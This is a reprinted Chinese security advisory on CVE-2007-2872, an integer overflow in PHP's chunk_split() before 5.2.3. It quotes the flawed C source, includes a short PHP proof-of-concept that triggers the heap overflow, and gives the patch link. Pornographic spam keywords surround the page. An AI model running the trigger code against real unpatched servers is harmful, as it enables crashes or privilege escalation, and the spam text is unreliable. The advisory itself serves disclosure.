国产精品人人爽人人做,激情小视频网站,黄色短视频免费看

受影響系統(tǒng)：
php php < 5.2.3
不受影響系統(tǒng)：
php php 5.2.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872

php是一種流行的WEB 服務(wù)器端編程語(yǔ)言。

php中的chunk_split函數(shù)在處理畸形參數(shù)時(shí)存在整數(shù)溢出漏洞，本地攻擊者可能利用此漏洞提升自己的權(quán)限。

php中chunk_split函數(shù)的1963行試圖為函數(shù)結(jié)果分配充分的內(nèi)存大小，但沒(méi)有執(zhí)行任何檢查便使用了srclen和chunklen參數(shù)塊。如果值的塊和endlen大于65534字節(jié)的話，就會(huì)觸發(fā)整數(shù)溢出，分配錯(cuò)誤的內(nèi)存大小，導(dǎo)致堆溢出。

ext/standard/string.c：

1953 static char *php_chunk_split(char *src, int srclen, char *end,
int endlen, int chunklen, int *destlen)
1954 {
1955 char *dest;
1956 char *p, *q;
1957 int chunks; /* complete chunks! */
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
sizeof(char), 0);
1964
1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966 memcpy(q, p, chunklen);
1967 q += chunklen;
1968 memcpy(q, end, endlen);
1969 q += endlen;
1970 p += chunklen;
1971 }

<*來(lái)源：Gerhard Wagner

鏈接：http://marc.info/?l=bugtraq&m=118071054000708&w=2
http://www.php.NET/releases/5_2_3.php
http://secunia.com/advisories/25456/
*>

測(cè)試方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)！

<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>

建議：
--------------------------------------------------------------------------------
廠商補(bǔ)丁：

php
---
目前廠商已經(jīng)發(fā)布了升級(jí)補(bǔ)丁以修復(fù)這個(gè)安全問(wèn)題，請(qǐng)到廠商的主頁(yè)下載：

http://www.php.NET/downloads.php#v5

文章來(lái)自: 綠盟科技

php技術(shù)：PHP5.2下chunk_split()函數(shù)整數(shù)溢出漏洞分析，轉(zhuǎn)載需保留來(lái)源！

鄭重聲明：本文版權(quán)歸原作者所有，轉(zhuǎn)載文章僅為傳播更多信息之目的，如作者信息標(biāo)記有誤，請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除，多謝。

一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

PHP5.2下chunk_split()函數(shù)整數(shù)溢出漏洞分析

相關(guān)文章閱讀